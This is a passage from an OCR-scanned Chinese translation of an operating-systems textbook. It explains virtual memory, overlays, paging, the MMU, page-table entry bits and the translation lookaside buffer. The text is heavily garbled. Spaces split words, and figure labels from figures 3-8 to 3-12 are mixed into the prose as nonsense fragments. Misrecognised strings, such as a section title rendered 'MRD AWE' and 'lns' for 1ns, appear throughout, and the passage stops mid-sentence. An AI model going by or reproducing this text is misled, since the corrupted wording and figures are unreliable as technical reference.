快速 适 配 算法 寻找 一 个 指定 大 小 的 空闲 区 是 十 分 快速 的 ， 但 它 和 所 有 将 空闲 区 按 大 小 排序 的 方案 一 
样 ， 都 有 一 个 共同 的 缺点 ， 即 在 一 个 进程 终止 或 被 换 出 时 ， 寻 找 它 的 相 邻 块 并 查看 是 否 可 以 合并 的 过 程 
是 非常 费时 的 。 如 果 不 进行 合并 ， 内 存 将 会 很 快 分 裂 出 大 量 的 进程 无 法 利用 的 小 空闲 区 。 


3.3 虚拟 内 存 


尽管 基 址 寄存 器 和 界限 寄存 器 可 以 用 于 创建 地 址 空间 的 抽象 ， 还 有 另 一 个 问题 需要 解决 : 管理 软件 
的 膨胀 (bloatware) 。 虽 然 存 储 器 容量 增长 快速 ， 但 是 软件 大 小 的 增长 更 快 。 在 20 世 纪 80 年 代 ， 许 多 大 
学 用 一 台 4MB 的 VAX 计 算 机 运行 分 时 操作 的 系统 ， 供 十 几 个 用 户 (已 经 或 多 或 少 足 够 满足 需要 了 ) 同时 
运行 。 现 在 微软 公司 推荐 64 位 Windows 8 系统 至 少 需要 2GB 内 存 ， 而 多 媒体 的 潮流 则 进一步 推动 了 对 内 
存 的 需求 。 

这 一 发 展 的 结果 是 ， 需 要 运行 的 程序 往往 大 到 内 存 无 法 容纳 ， 而 且 必 然 需要 系统 能 够 支持 多 个 程序 
同时 运行 ， 即 使 内 存 可 以 满足 其 中 单独 一 个 程序 的 需要 ， 总 体 来 看 它们 仍然 超出 了 内 存 大 小 。 交 换 技术 
并 不 是 一 个 具有 吸引 力 的 解决 方案 ， 因 为 一 个 典型 SATA 磁 盘 的 峰值 传输 率 高 达 每 秒 好 几 百 上 净 ， 这 意味 
着 需要 好 几 秒 才能 换 出 或 换 入 一 个 1GB 的 程序 。 

程序 大 于 内 存 的 问题 早 在 计算 时 代 伊始 就 产生 了 ， 虽 然 只 是 有 限 的 应 用 领域 ， 像 科学 和 工程 计算 
(模拟 宇宙 的 创建 或 模拟 新 型 航空 器 都 会 花费 大 量 内存 ) 。 在 20 世 纪 60 年 代 所 采取 的 解决 方法 是 : 把 程序 
分 割 成 许多 片段 ， 称 为 覆盖 (overlay ) 。 程 序 开始 执行 时 ， 将 覆盖 管理 模块 装 入 内 存 ， 该 管理 模块 立即 
装 和 并 运行 覆盖 0。 执 行 完成 后 ， 覆 盖 0 通 知 管理 模块 装 入 覆盖 1， 或 者 占用 覆盖 0 的 上 方位 置 (如 果 有 空 
间 )， 或 者 占用 覆盖 0 (如 果 没 有 空间 )。 一 些 覆 盖 系 统 非常 复杂 ， 人 允许 多 个 覆盖 块 同时 在 内 存 中 。 和 覆盖 
块 存放 在 磁盘 上 ， 在 需要 时 由 操作 系统 动态 地 换 入 换 出 。 

虽然 由 系统 完成 实际 的 覆盖 块 换 入 换 出 操作 ， 但 是 程序 员 必 须 把 程序 分 割 成 多 个 片段 。 把 一 个 大 程 
序 分 割 成 小 的 、 模 块 化 的 片段 是 非常 费时 和 枯燥 的 ， 并 且 易 于 出 错 。 很 少 程序 员 擅 长 使 用 覆盖 技术 。 因 
此 ， 没 过 多 久 就 有 人 找到 一 个 办 法 ， 把 全 部 工作 都 交 给 计算 机 去 做 。 

采用 的 这 个 方法 (Fotheringham, 1961) 称 为 虚拟 内 存 (virtual memory) 。 虚 拟 内 存 的 基本 思想 是 : 
每 个 程序 拥有 自己 的 地 址 空间 ， 这 个 空间 被 分 割 成 多 个 块 ， 每 一 块 称 作 一 页 或 页 面 (page) 。 每 一 页 有 
连续 的 地 址 范围 。 这 些 页 被 映射 到 物理 内 存 ， 但 并 不 是 所 有 的 页 都 必须 在 内 存 中 才能 运行 程序 。 当 程序 
引用 到 一 部 分 在 物理 内 存 中 的 地 址 空间 时 ， 由 硬件 立刻 执行 必要 的 映射 。 当 程序 引用 到 一 部 分 不 在 物理 
内 存 中 的 地 址 空间 时 ， 由 操作 系统 负责 将 缺失 的 部 分 装 人 物理 内 存 并 重新 执行 失败 的 指令 。 

从 某 个 角度 来 讲 ， 虚 拟 内 存 是 对 基 址 寄存 器 和 界限 寄存 器 的 一 种 综合 。8088 为 正文 和 数据 分 离 出 专 
门 的 基 址 寄存 器 (但 不 包括 界限 寄存 器 )。 而 虚拟 内 存 使 得 整个 地 址 空间 可 以 用 相对 较 小 的 单元 映射 到 
物理 内 存 ， 而 不 是 为 正文 段 和 数据 段 分 别 进行 重 定 位 。 下 面 会 介绍 虚拟 内 存 是 如 何 实 现 的 。 

虚拟 内 存 很 适合 在 多 道 程序 设计 系统 中 使 用 ， 许 多 程序 的 片段 同时 保存 在 内 存 中 。 当 一 个 程序 等 待 
它 的 一 部 分 读 入 内 存 时 ， 可 以 把 CPU 交 给 另 一 个 进程 使 用 。 
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3.3.1 分 页 

大 部 分 虚拟 内 存 系统 中 都 使 用 一 种 称 为 分 页 (paging) 的 技术 ， 我 们 现在 就 介绍 这 一 技术 。 在 任何 
一 台 计 算 机 上 ， 程序 引 用 了 一 组 内 存 地 址 。 当 程序 执行 指令 

MOV REG, 1000 


时 ， 它 把 地 址 为 1000 的 内 存单 元 的 内 容 复制 到 REG 中 (或 者 相反 ， 这 取决 于 计算 机 的 型 号 ) 。 地 址 可 以 
通过 索引 、 基 址 寄存 器 、 段 寄存 器 或 其 他 方式 产生 。 

由 程序 产生 的 这 些 地 址 称 为 虚拟 地 址 (virtual address), ， 它 们 构成 了 一 个 虚拟 地 址 空间 (virtual address 
space)。 在 没有 虚拟 内 存 的 计算 机 上 ， 系 统 直接 将 虚拟 地 址 送 到 内 存 总 线 上 ， 读 写 操作 使 用 具有 同样 地 址 的 
物理 内 存 字 ， 而 在 使 用 虚拟 内 存 的 情况 下 ， 虚 拟 地 址 不 是 被 直接 送 到 内 存 总 线 上 ， 而 是 被 送 到 内 存 管理 单 
元 (Memory Management Unit，MMU)，MMU 把 虚拟 地 址 映射 为 物理 内 存 地 址 ， 如 图 3-8 所 示 。 

图 3-9 所 示 的 简单 例子 说 明了 这 种 映射 是 如 何 工作 的 。 在 这 个 例子 中 ， 有 一 台 可 以 产生 16 位 地 址 的 
计算 机 ， 地 址 范围 从 0 到 64K 一 1， 且 这 些 地 址 是 虚拟 地 址 。 然 而 ， 这 台 计 算 机 只 有 32KB 的 物理 内 存 ， 
Kk, 虽然 可 以 编写 64KB 的 程序 ， 但 它们 却 不 能 被 完全 调和 内存 运 行 。 在 磁盘 上 必须 有 一 个 最 多 64KB 的 
程序 核心 映像 的 完整 副本 ， 以 保证 程序 片段 在 需要 时 能 被 调 入 内 存 。 


虚拟 地 址 空间 


60K~64K[ x | 
56K 一 60K| x |} 虚拟 页 面 





CPU 发 送 虚 拟 地 址 给 MMU 40K~44K| X | 
glee] Ol 物理 内 存 地 址 
CPU 





8K~ 12K 8K~ 12K 

4K ~8K — : 4K ~8K 

vee ry [| Nok~ak 
MMU 发 送 物理 地 址 给 存储 器 \ 

页 框 
图 3-8 MMU 的 位 置 和 功能 。 这 里 MMU 作 为 CPU 芯 片 的 ”图 3-9 页 表 给 出 虚拟 地 址 与 物理 内 存 地 址 之 间 的 

一 部 分 ， 因 为 通常 就 是 这 样 做 的 。 不 过 从 逻辑 上 映射 关系 。 每 一 页 起 始 于 4096 的 倍数 位 置 ， 
看 ， 它 可 以 是 一 片 单独 的 芯片 ， 并 且 早 就 已 经 这 结束 于 起 址 加 4095 的 位 置 ， 所 以 4K 到 8K 实 
样 了 际 为 4096~8191，8K 到 12K 就 是 8192~12 287 


虚拟 地 址 空间 按照 固定 大 小 划分 成 被 称 为 页 面 (page) 的 若干 单元 。 在 物理 内 存 中 对 应 的 单元 称 为 
THE (page frame)。 页 面 和 页 框 的 大 小 通常 是 一 样 的 ， 在 本 例 中 是 4KB， 但 实际 系统 中 的 页 面 大 小 从 
512 字 节 到 1GB。 对 应 于 64KB 的 虚拟 地 址 空间 和 32KB 的 物理 内 存 ， 可 得 到 16 个 虚拟 页 面 和 8 个 页 框 。 
RAM 和 磁盘 之 间 的 交换 总 是 以 整个 页 面 为 单元 进行 的 。 很 多 处 理 器 根据 操作 系统 认为 适合 的 方式 ， 支 
持 对 不 同 大 小 页 面 的 混合 使 用 和 匹配 。 例 如 ，x86-64 架 构 的 处 理 器 支持 4KB、2MB 和 1GB 大 小 的 页 面 ， 
因此 ， 可 以 将 一 组 4KB 大 小 的 页 面 用 于 用 户 程序 ， 将 一 个 1GB 大 小 的 页 面 用 于 内 核 程序 。 稍 后 将 介绍 为 
什么 有 时 候 用 一 个 较 大 的 页 面 好 于 用 一 堆 较 小 的 页 面 。 

图 3:9 中 的 标记 符号 如 下 : 标记 OK~4K 的 范围 表示 该 页 的 虚拟 地 址 或 物理 地 址 是 0~4095，4K~8K 的 范围 表 
示 地 址 4096~8191， 等 等 。 每 一 页 包含 了 4096 个 地 址 ， 起 始 于 4096 的 整数 倍 位 置 ， 结 束 于 4096 倍 数 缺 1 的 位 置 。 

当 程 序 试图 访问 地 址 0 时 ， 例 如 执行 下 面 这 条 指令 
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MOV REG, 0 


将 虚拟 地 址 0 送 到 MMU。MMU 看 到 虚拟 地 址 落 在 页 面 0 (0~4095) ， 根 据 其 映射 结果 ， 这 一 页 面 对 应 的 
是 页 框 2 (8192~12 287)， 因 此 MMU 把 地 址 变换 为 8192， 并 把 地 址 8192 送 到 总 线 上 。 内 存 对 MMU 一 无 
所 知 ， 它 只 看 到 一 个 读 或 写 地 址 8192 的 请 求 并 执行 它 。MMU 从 而 有 效 地 把 所 有 从 0~4095 的 虚拟 地 址 映 
射 到 了 8192~12 287 的 物理 地 址 。 

同样 地 ， 指 令 

MOV REG, 8192 


被 有 效 地 转换 为 : 
MOV REG, 24576 


因为 虚拟 地 址 8192 (在 虚拟 页 面 2 中 ) 被 映射 到 物理 地 址 24 576 (在 物理 页 框 6 中 ) 上 。 第 三 个 例子 ， 虚 
拟 地 址 20 500 在 距 虚拟 页 面 5 (虚拟 地 址 20 480~24 575) 起 始 地 址 20 字 节 处 ， 并 且 被 映射 到 物理 地 址 
12 288 +20 = 12 308, 

通过 恰当 地 设置 MMU ， 可 以 把 16 个 虚拟 页 面 映射 到 8 个 页 框 中 的 任何 一 个 。 但 是 这 并 没有 解决 虚拟 
地 址 空间 比 物理 内 存 大 的 问题 。 在 图 3-9 中 只 有 8 个 物理 页 框 ， 于 是 只 有 8 个 虚拟 页 面 被 映射 到 了 物理 内 
存 中 ， 在 图 3-9 中 用 叉 号 表示 的 其 他 页 面 并 没有 被 映射 。 在 实际 的 硬件 中 ， 用 一 个 “在 /不 在 ”位 
(present/absent bit) 记录 页 面 在 内 存 中 的 实际 存在 情况 。 

当 程序 访问 了 一 个 未 映射 的 页 面 ， 例 如 执行 指令 

MOV REG，32780 


将 会 发 生 什么 情况 呢 ? 虚拟 页 面 8 (从 32 768 开 始 ) 的 第 12 个 字 节 所 对 应 的 物理 地 址 是 什么 呢 ? MMU 注 
意 到 该 页 面 没 有 被 映射 (在 图 中 用 叉 号 表示 )， 于 是 使 CPU 陷 入 到 操作 系统 ， 这 个 陷阱 称 为 缺 页 中 断 或 
缺 页 错误 (page fault)。 操 作 系 统 找到 一 个 很 少 使 用 的 页 框 且 把 它 的 内 容 写 入 磁盘 (如 果 它 不 在 磁盘 上 )。 
随后 把 需要 访问 的 页 面 读 到 刚才 回收 的 页 框 中 ， 修 改 映射 关系 ， 然 后 重新 启动 引起 陷阱 的 指令 。 

例如 ， 如 果 操 作 系 统 决定 放弃 页 框 1， 那 么 
它 将 把 虚拟 页 面 8 装 入 物理 地 址 4096， 并 对 MMU 
映射 做 两 处 修改 。 首 先 ， 它 要 将 虚拟 页 面 1 的 表 
项 标记 为 未 映射 ， 使 以 后 任何 对 虚拟 地 址 
4096~8191 的 访问 都 导致 陷阱 。 随 后 把 虚拟 页 面 8 
的 表 项 的 又 号 改 为 1， 因 此 在 引起 陷阱 的 指令 重 
新 启动 时 ， 它 将 把 虚拟 地 址 32 780 映 射 为 物理 地 

下 面 查看 一 下 MMU 的 内 部 结构 以 便 了 解 它 制 到 输出 的 12 
是 怎么 工作 的 ， 以 及 了 解 为 什么 我 们 选用 的 页 面 
大 小 都 是 2 的 整数 次 寡 。 在 图 3-10 中 可 以 看 到 一 个 
虚拟 地 址 的 例子 ， 虚 拟 地 址 8196 (二 进 制 是 
0010000000000100) 用 图 3-9 所 示 的 MMU 映 射 机 
制 进行 映射 ， 输 入 的 16 位 虚拟 地 址 被 分 为 4 位 的 
页 号 和 12 位 的 偏 移 量 。4 位 的 页 号 可 以 表示 16 个 虚拟 页 面 =2 被 用 
页 面 ，12 位 的 偏 移 可 以 为 一 页 内 的 全 部 4096 个 字 作 页 表 的 索引 
节 编 址 。 [aloTiToloTo[o[oTo[ofoTo[oTToTo] 

可 用 页 号 作为 页 表 (page table) 的 索引 ， 以 
得 出 对 应 于 该 虚拟 页 面 的 页 框 号 。 如果“ 在 /不 在 ” 
位 是 0， waste +B RGAE. eae 图 3-10 在 16 个 4KB 页 面 情况 下 MMU 的 内 部 操作 
是 1， 则 将 在 页 表 中 查 到 的 页 框 号 复制 到 输出 寄存 器 的 高 3 位 中 ， 再 加 上 输入 虚拟 地 址 中 的 低 12 位 偏 移 量 。 
如 此 就 构成 了 15 位 的 物理 地 址 。 输 出 寄存 器 的 内 容 随即 被 作为 物理 地 址 送 到 内 存 总 线 。 
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3.3.2 页 表 

作为 一 种 最 简单 的 实现 ， 虚 拟 地 址 到 物理 地 址 的 映射 可 以 概括 如 下 虚拟 地 址 被 分 成 虚拟 页 号 (高 
位 部 分 ) 和 偏 移 量 (低位 部 分 ) 两 部 分 。 例 如 ， 对 于 16 位 地 址 和 4KB 的 页 面 大 小 ， 高 4 位 可 以 指定 16 个 
虚拟 页 面 中 的 一 页 ， 而 低 12 位 接着 确定 了 所 选 页 面 中 的 字 节 偏 移 量 (0~4095)。 但 是 使 用 3 或 者 5 或 者 其 
他 位 数 拆 分 虚拟 地 址 也 是 可 行 的 。 不 同 的 划分 对 应 不 同 的 页 面 大 小 。 

虚拟 页 号 可 用 作 页 表 的 索引 ， 以 找到 该 虚拟 页 面 对 应 的 页 表 项 。 由 页 表 项 可 以 找到 页 框 号 (如 果 有 
的 话 )。 然 后 把 页 框 号 拼接 到 偏 移 量 的 高 位 端 ， 以 替换 掉 虚 拟 页 号 ， 形 成 送 往 内 存 的 物理 地 址 。 

页 表 的 目的 是 把 虚拟 页 面 映射 为 页 框 。 从 数学 角度 说 ， 页 表 是 一 个 函数 ， 它 的 参数 是 虚拟 页 号 ， 结 
果 是 物理 页 框 号 。 通 过 这 个 函数 可 以 把 虚拟 地 址 中 的 虚拟 页 面 域 替换 成 页 框 域 ， 从 而 形成 物理 地 址 。 

在 本 章 中 ， 我 们 只 关心 虚拟 内 存 和 不 完全 
虚拟 化 ， 换 言 之 ， 不 涉及 虚拟 机 。 我 们 在 第 7 章 Be te 
中 将 会 看 到 ， 每 个 虚拟 机 都 需要 自己 的 虚拟 内 禁止 位 修改 位 “在 /不 在 ”位 


/ 
存 ， 因 此 页 表 组 织 变 得 很 复杂 ， 包 括 影子 页 表 GF | oes O O 
和 做 套 页 表 。 我 们 会 看 到 ， 即 使 没有 这 些 复 杂 AAL L nus 


的 配置 ， 页 面 调度 和 虚拟 内 存 也 相当 复杂 。 访问 位 “保护 位 
页 表 项 的 结构 7 
下 面 将 讨论 单个 页 表 项 的 细节 。 页 表 项 的 图 9-11 一 个 典型 的 页 表 项 


结构 是 与 机 器 密切 相关 的 ， 但 不 同 机 器 的 页 表 项 存储 的 信息 都 大 致 相同 。 图 3-11 中 给 出 了 页 表 项 的 一 个 
例子 。 不 同 计算 机 的 页 表 项 大 小 可 能 不 一 样 ， 但 32 位 是 一 个 常用 的 大 小 。 最 重要 的 域 是 页 框 号 。 毕 竟 页 
映射 的 目的 是 找到 这 个 值 ， 其 次 是 “在 /不 在 ”位 。 这 一 位 是 1 时 表示 该 表 项 是 有 效 的 ， 可 以 使 用 ， 如 果 
是 0， 则 表示 该 表 项 对 应 的 虚拟 页 面 现 在 不 在 内 存 中 ， 访 问 该 页 面 会 引起 一 个 缺 页 中 断 。 

保护 (protection) 位 指出 一 个 页 允许 什么 类 型 的 访问 。 最 简单 的 形式 是 这 个 域 只 有 一 位 ，0 表 示 读 / 
写 ，1 表 示 只 读 。 一 个 更 先进 的 方法 是 使 用 三 位 ， 各 位 分 别 对 应 是 否 启用 读 、 写 、 执 行 该 页 面 。 

为 了 记录 页 面 的 使 用 状况 ， 引 入 了 修改 (modified) 位 和 访问 (referenced) 位 。 在 写 入 一 页 时 由 硬 
件 自动 设置 修改 位 。 该 位 在 操作 系统 重新 分 配 页 框 时 是 非常 有 用 的 。 如 果 一 个 页 面 已 经 被 修改 过 ( 即 它 
是 “ 脏 ” 的 )， 则 必须 把 它 写 回 磁盘 。 如 果 一 个 页 面 没 有 被 修改 过 ( 即 它 是 “干净 ”的 )， 则 只 简单 地 把 
它 丢 弃 就 可 以 了 ， 因 为 它 在 磁盘 上 的 副本 仍然 是 有 效 的 。 这 一 位 有 时 也 被 称 为 脏 位 (dirty bit) ， 因 为 它 
反映 了 该 页 面 的 状态 。 

不 论 是 读 还 是 写 ， 系 统 都 会 在 该 页 面 被 访问 时 设置 访问 位 。 它 的 值 被 用 来 帮助 操作 系统 在 发 生 缺 页 
中 断 时 选择 要 被 淘汰 的 页 面 。 不 再 使 用 的 页 面 要 比 正 在 使 用 的 页 面 更 适合 淘汰 。 这 一 位 在 即将 讨论 的 很 
多 页 面 置 换算 法 中 都 会 起 到 重要 的 作用 。 

最 后 一 位 用 于 禁止 该 页 面 被 高 速 缓存 。 对 那些 映射 到 设备 寄存 器 而 不 是 常规 内 存 的 页 面 而 言 ， 这 个 
特性 是 非常 重要 的 。 假 如 操作 系统 正在 紧张 地 循环 等 待 某 个 IO 设备 对 它 刚 发 出 的 命令 作出 响应 ， 保 证 
硬件 是 不 断 地 从 设备 中 读 取 数 据 而 不 是 访问 一 个 旧 的 被 高 速 缓 存 的 副本 是 非常 重要 的 。 通 过 这 一 位 可 以 
禁止 高 速 缓存 。 具 有 独立 的 MO 空 间 而 不 使 用 内 存 映射 IO 的 机 器 不 需要 这 一 位 。 

应 该 注意 的 是 ， 若 某 个 页 面 不 在 内 存 中 ， 用 于 保存 该 页 面 的 磁盘 地 址 不 是 页 表 的 组 成 部 分 。 原 因 很 
简单 ， 页 表 只 保存 把 虚拟 地 址 转换 为 物理 地 址 时 硬件 所 需要 的 信息 。 操 作 系统 在 处 理 缺 页 中 断 时 需要 把 
该 页 面 的 磁盘 地 址 等 信息 保存 在 操作 系统 内 部 的 软件 表格 中 。 硬 件 不 需要 它 。 

在 深入 到 更 多 应 用 实现 问题 之 前 ， 值 得 再 次 强调 的 是 : 虚拟 内 存 本 质 上 是 用 来 创造 一 个 新 的 抽象 概 
念 一 一 地 址 空间 ， 这 个 概念 是 对 物理 内 存 的 抽象 ， 类 似 于 进程 是 对 物理 处 理 器 (CPU) 的 抽象 。 虚 拟 内 
存 的 实现 ， 是 将 虚拟 地 址 空间 分 解 成 页 ， 并 将 每 一 页 映射 到 物理 内 存 的 某 个 页 框 或 者 (暂时 ) 解除 映射 。 
因此 ， 本 节 的 基本 内 容 是 操作 系统 创建 的 抽象 ， 以 及 如 何 管理 这 个 抽象 。 

3.3.3 MRD AWE 

我 们 已 经 了 解 了 虚拟 内 存 和 分 页 的 基础 。 现在 可 以 更 具体 地 讨论 可 能 的 实现 了 。 在 任何 分 页 系统 中 ， 
都 需要 考虑 两 个 主要 问题 : 

1) 虚拟 地 址 到 物理 地 址 的 映射 必须 非常 快 。 

2) 如 果 虚 拟 地 址 空间 很 大 ， 页 表 也 会 很 大 。 
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第 一 个 问题 是 由 于 每 次 访问 内 存 都 需要 进行 虚拟 地 址 到 物理 地 址 的 映射 ， 所 有 的 指令 最 终 都 必须 来 
自 内 存 ， 并 且 很 多 指令 也 会 访问 内 存 中 的 操作 数 。 因 此 ,每 条 指令 进行 一 两 次 或 更 多 页 表 访 问 是 必要 的 。 
如 果 执 行 一 条 指令 需要 lns， 页 表 查 询 必 须 在 0.2ns 之 内 完成 ， 以 避免 映射 成 为 一 个 主要 瓶颈 。 

第 二 个 问题 来 自 现代 计算 机 使 用 至 少 32 位 的 虚拟 地 址 ， 而 且 64 位 变 得 越 来 越 普遍 。 假 设 页 面 大 小 为 
4KB, ，32 位 的 地 址 空间 将 有 100 万 页 ， 而 64 位 地 址 空间 简直 多 到 超 乎 你 的 想象 。 如 果 虚 拟 地 址 空间 中 有 
100 万 页 ， 那 么 页 表 必 然 有 100 万 条 表 项 。 另 外 请 记 住 ， 每 个 进程 都 需要 自己 的 页 表 (因为 它 有 自己 的 虚 
拟 地 址 空间 )。 

对 大 而 快速 的 页 映射 的 需求 成 为 构建 计算 机 的 重要 约束 。 最 简单 的 设计 (至 少 从 概念 上 ) 是 使 用 由 
“快速 硬件 寄存 器 ”阵列 组 成 的 单一 页 表 ， 每 一 个 表 项 对 应 一 个 虚拟 页 面 ， 虚 拟 页 号 作为 索引 ， 如 图 3- 
10 所 示 。 当 启动 一 个 进程 时 ， 操 作 系统 把 保存 在 内 存 中 的 进程 页 表 的 副本 载 入 到 寄存 器 中 。 在 进程 运行 
过 程 中 ， 不 必 再 为 页 表 而 访问 内 存 。 这 个 方法 的 优势 是 简单 并 且 在 映射 过 程 中 不 需要 访问 内 存 。 而 缺点 
是 在 页 表 很 大 时 ， 代 价 高 晶 。 而 且 每 一 次 上 下 文 切换 都 必须 装载 整个 页 表 ， 这 样 会 降低 性 能 。 

另 一 种 极端 方法 是 ， 整 个 页 表 都 在 内 存 中 。 那 时 所 需 的 硬件 仅仅 是 一 个 指向 页 表 起 始 位 置 的 寄存 器 。 
这 样 的 设计 使 得 在 上 下 文 切换 上 时， 进行 “虚拟 地 址 到 物理 地 址 ”的 映射 只 需 重 新 装 入 一 个 寄存 器 。 当 然 ， 
这 种 做 法 的 缺陷 是 在 执行 每 条 指令 时 ， 都 需要 一 次 或 多 次 内 存 访问 来 完成 页 表 项 的 读 入 ， 速 度 非常 慢 。 

1. 转换 检测 缓冲 区 

现在 讨论 加 速 分 页 机 制 和 处 理 大 的 虚拟 地 址 空间 的 实现 方案 ， 先 介绍 加 速 分 页 问题 。 大 多 数 优 化 技 
术 都 是 从 内 存 中 的 页 表 开 始 的 。 这 种 设计 对 效率 有 着 巨大 的 影响 。 例 如 ， 假 设 一 条 1 字 节 指令 要 把 一 个 
寄存 器 中 的 数据 复制 到 另 一 个 寄存 器 。 在 不 分 页 的 情况 下 ， 这 条 指令 只 访问 一 次 内 存 ， 即 从 内 存 中 取 指 
令 。 有 了 分 页 机 制 后 ， 会 因为 要 访问 页 表 而 引起 更 多 次 的 内 存 访 问 。 由 于 执行 速度 通常 被 CPU 从 内 存 中 
取 指 令 和 数据 的 速度 所 限制 ， 所 以 两 次 访问 内 存 才能 实现 一 次 内 存 访问 会 使 性 能 下 降 一 半 。 在 这 种 情 
况 下 ， 没 人 会 采用 分 页 机 制 。 

多 年 以 来 ， 计 算 机 的 设计 者 已 经 意识 到 了 这 个 问题 ， 并 找到 了 一 种 解决 方案 。 这 种 解决 方案 的 建立 
基于 这 样 一 种 观察 : 大 多 数 程序 总 是 对 少量 的 页 面 进 行 多 次 的 访问 ， 而 不 是 相反 。 因 此 ， 只 有 很 少 的 页 
表 项 会 被 反复 读 取 ， 而 其 他 的 页 表 项 很 少 被 访问 。 

上 面 提 到 的 解决 方案 是 为 计算 机 设置 一 个 小 型 的 硬件 设备 ， 将 虚拟 地 址 直接 映射 到 物理 地 址 ， 而 不 
必 再 访问 页 表 。 这 种 设备 称 为 转换 检测 缓冲 区 (Translation Lookaside Buffer，TLB ) ， 有 时 又 称 为 相 联 
存储 器 (associate memory) 或 快 表 ， 如 图 3-12 所 示 。 它 通常 在 MMU 中 ， 包 含 少量 的 表 项 ， 在 此 例 中 为 
8 个 ， 在 实际 中 很 少 会 超过 256 个 。 每 个 表 项 记录 了 一 个 页 面 的 相关 信息 ， 包 括 虚 拟 页 号 、 页 面 的 修改 位 、 
保护 码 〈 读 / 写 /执行 权限 ) 和 该 页 所 对 应 的 物理 页 框 。 除 了 虚拟 页 号 (不 是 必须 放 在 页 表 中 )， 这 些 域 与 
页 表 中 的 域 是 一 一 对 应 的 。 另 外 还 有 一 位 用 来 记 





















































录 这 个 表 项 是 否 有 效 〈 即 是 否 在 使 用 ) 。 有 效 位 | 虚拟 页 面 号 | 修改 位 | 保护 位 | mes 
例如 ， 如 果 一 个 进程 在 虚拟 地 址 19、20 和 。 | 二 一 Lm p 

21 之 间 有 一 个 循环 ， 那 么 可 以 生成 图 3-12 中 的 ”| 二 翩 r | aw 这 

TLB, 这 些 TLB 表 项 中 有 可 读 和 可 执行 的 保护 码 。 ”| 一 一 加 一 一 a oe an 

当前 主要 使 用 的 数据 (假设 是 个 数组 ) 放 在 页 面 | 19 | o | ax 50 

129 和 页 面 130 中 。 页 面 140 包 含 了 用 于 数组 计算 1 21 站 | 

的 索引 。 最 后 ， 堆 栈 位 于 页 面 860 和 页 面 861。 1 ao | 1 | w 14 
现在 看 一 下 TLB 是 如 何 工作 的 。 将 一 个 虚拟 。 [1 | e 1 | aw 75 

地 址 放 入 MMU 中 进行 转换 时 ， 硬 件 首先 通过 将 图 3-12 TLB 加 速 分 页 


该 虚拟 页 号 与 TLB 中 所 有 表 项 同时 ( 即 并 行 ) 进 
行 匹 配 , 判断 虚拟 页 面 是 否 在 其 中 。 如 果 发 现 了 一 个 有 效 的 匹配 并 且 要 进行 的 访问 操作 并 不 违反 保护 位 ， 
则 将 页 框 号 直接 从 TLB 中 取出 而 不 必 再 访问 页 表 。 如 果 虚 拟 页 号 确实 是 在 TLB 中 ， 但 指令 试图 在 一 个 只 
读 页 面 上 进行 写 操作 ， 则 会 产生 一 个 保护 错误 ， 就 像 对 页 表 进 行 非法 访问 一 样 。 

当 虚 拟 页 号 不 在 TLB 中 时 会 怎样 呢 ? 如 果 MMU 检 测 到 没有 有 效 的 匹配 项 ， 就 会 进行 正常 的 页 表 查 


O 在 这 里 是 一 级 页 表 。 一 一 译 者 注 
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询 。 接 着 从 TLB 中 淘汰 一 个 表 项 ， 然 后 用 新 找到 的 页 表 项 代替 它 。 这 样 ， 如 果 这 一 页 面 很 快 被 再 次 访问 ， 
第 二 次 访问 TLB 时 自然 将 会 命中 而 不 是 未 命中 。 当 一 个 表 项 被 清除 出 TLB 时 ， 将 修改 位 复制 到 内 存 中 的 
页 表 项 ， 而 除了 访问 位 ， 其 他 的 值 不 变 。 当 页 表 项 中 从 页 表 中 装 入 TLB 中 时 ， 所 有 的 值 都 来 自 内 存 。 

2. 软件 TLB 管 理 

到 目前 为 止 ， 我 们 已 经 假设 每 一 台 具 有 虚拟 内 存 的 机 器 都 具有 由 硬件 识别 的 页 表 ， 以 及 一 个 TLB。 
在 这 种 设计 中 ， 对 TLB 的 管理 和 TLB 的 失效 处 理 都 完全 由 MMU 硬 件 来 实现 。 只 有 在 内 存 中 没有 找到 某 
个 页 面 时 ， 才 会 陷入 到 操作 系统 中 。 

在 过 去 ， 这 样 的 假设 是 正确 的 。 但 是 ， 许 多 现代 的 RISC 机 器 ， 包 括 SPARC、MIPS 以 及 (现在 废弃 
的 ) HP PA， 几 乎 所 有 的 页 面 管理 都 是 在 软件 中 实现 的 。 在 这 些 机 器 上 ，TLB 表 项 被 操作 系统 显 式 地 装 
载 。 当 发 生 TLB 访 问 失效 时 ， 不 再 是 由 MMU 到 页 表 中 查找 并 取出 需要 的 页 表 项 ， 而 是 生成 一 个 TLB 失 
效 并 将 问题 交 给 操作 系统 解决 。 系 统 必须 先 找到 该 页 面 ， 然 后 从 TLB 中 删除 一 个 项 ， 接 着 装载 一 个 新 的 
项 ， 最 后 再 执行 先前 出 错 的 指令 。 当 然 ， 所 有 这 一 切 都 必须 在 有 限 的 几 条 指令 中 完成 ， 因 为 TLB 失 效 比 
缺 页 中 断 发 生得 更 加 频繁 。 

让 人 感到 惊奇 的 是 ， 如 果 TLB 大 到 (如 64 个 表 项 ) 可 以 减少 失效 率 时 ，TLB 的 软件 管理 就 会 变 得 足 
够 有 效 。 这 种 方法 的 最 主要 的 好 处 是 获得 了 一 个 非常 简单 的 MMU ， 这 就 在 CPU 芯片 上 为 高 速 缓存 以 及 
其 他 改善 性 能 的 设计 腾 出 了 相当 大 的 空间 。Uhlig 等 人 (Uhlig, 1994) 在 论文 中 讨论 过 软件 TLB 管 理 。 

很 时 以 前 就 已 经 开发 了 多 种 不 同 的 策略 来 改善 采用 软件 TLB 管 理 机 制 的 机 器 的 性 能 。 其 中 一 种 策略 
是 在 减少 TLB 失 效 的 同时 ， 又 要 在 发 生 TLB 失 效 时 减少 处 理 开销 (Bala 等 人 ，1994)。 为 了 减少 TLB 失 
效 ， 有 时 候 操作 系统 能 用 “直觉 ”指出 哪些 页 面 下 一 步 可 能 会 被 用 到 并 预先 为 它们 在 TLB 中 装载 表 项 。 
例如 ， 当 一 个 客户 进程 发 送 一 条 消息 给 同一 台 机 器 上 的 服务 器 进程 ， 很 可 能 服务 器 将 不 得 不 立即 运行 。 
了 解 了 这 一 点 ， 当 执行 处 理 send 的 陷阱 时 ， 系 统 也 可 以 找到 服务 器 的 代码 页 、 数 据 页 以 及 堆栈 页 ， 并 在 
有 可 能 导致 TLB 失 效 前 把 它们 装载 到 TLB 中 。 

无 论 是 用 硬件 还 是 用 软件 来 处 理 TLB 失 效 ， 常 见方 法 都 是 找到 页 表 并 执行 索引 操作 以 定位 将 要 访问 
